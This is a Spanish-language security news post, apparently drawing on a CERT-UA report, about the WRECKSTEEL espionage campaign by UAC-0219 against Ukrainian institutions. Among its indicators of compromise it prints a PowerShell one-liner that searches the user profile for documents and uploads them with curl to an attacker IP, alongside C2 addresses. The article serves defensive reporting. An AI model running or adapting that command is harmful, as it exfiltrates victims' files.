WRECKSTEEL: El Malware que Se Infiltra con Excusas Salariales y Roba Todo a su Paso

Diego Cortes R. martes, junio 24, 2025Compartir:

 


La guerra digital en Ucrania sigue intensificándose. CERT-UA ha revelado una campaña de ciberespionaje dirigida a entidades gubernamentales y sectores críticos, ejecutada por el grupo UAC-0219. El arma utilizada es WRECKSTEEL, un malware sigiloso que roba documentos y toma capturas de pantalla sin ser detectado.

La campaña comenzó en el otoño de 2024 y ha evolucionado con técnicas cada vez más sofisticadas. Los atacantes envían correos electrónicos desde cuentas comprometidas, simulando provenir de agencias oficiales ucranianas. El mensaje suele incluir una supuesta lista de empleados afectados por recortes salariales, con un enlace que descarga un archivo malicioso.

Ese archivo, un script en VBS, actúa como cargador de un segundo script en PowerShell. Este último escanea el sistema en busca de archivos con extensiones como .doc, .pdf, .xlsx, .jpeg, entre otros, y los exfiltra mediante comandos curl. Además, toma capturas de pantalla del equipo infectado, todo en segundo plano.

Los enlaces maliciosos redirigen a servicios legítimos como DropMeFiles y Google Drive, lo que dificulta su detección. En versiones anteriores, los atacantes usaban instaladores NSIS con herramientas como IrfanView para capturar pantallas, pero desde 2025 esta función está integrada directamente en el script de PowerShell.

🔍 Indicadores de Compromiso (IoCs):

  • Extensiones de archivos objetivo:
    .doc, .docx, .txt, .xls, .xlsx, .pdf, .rtf, .odt, .csv, .ppt, .pptx, .png, .jpg, .jpeg
  • Direcciones IP de comando y control (C2):
    • 172.86.114.149
    • 167.88.167.254
    • 45.61.157.179
  • Comando PowerShell típico usado para exfiltración:

    • $extensions = @("*.doc", "*.txt", "*.docx", "*.xls", "*.xlsx", "*.pdf") foreach ($ext in $extensions) { $files = Get-ChildItem -Path $env:USERPROFILE -Filter $ext -Recurse foreach ($file in $files) { curl -F "file=@$($file.FullName)" http://172.86.88.186/upload } }

  • Servicios utilizados para alojar malware:
  • DropMeFiles
  • Google Drive

Este tipo de campañas no solo buscan robar información, sino también sembrar desconfianza y desestabilizar instituciones. CERT-UA recomienda a las organizaciones reforzar sus filtros de correo, monitorear conexiones salientes y reportar cualquier actividad sospechosa.


Fuentes: https://thehackernews.com/2025/06/apt28-uses-signal-chat-to-deploy.html

Fuente: https://cert.gov.ua/article/6284080

Si te gusta este contenido, no olvides seguirnos en nuestras redes sociales!:

Tags

Atención!: Hemos usado imagenes que nosotros hemos encontramos como libres, si detectas que alguna imagen te pertenece o consideras que estamos violando algún derecho de Autor avisanos inmediatamente al correo o por Inbox de Facebook y retiraremos la imagen inmediatamente. Solo adjuntanos el link. De ante mano muchas gracias!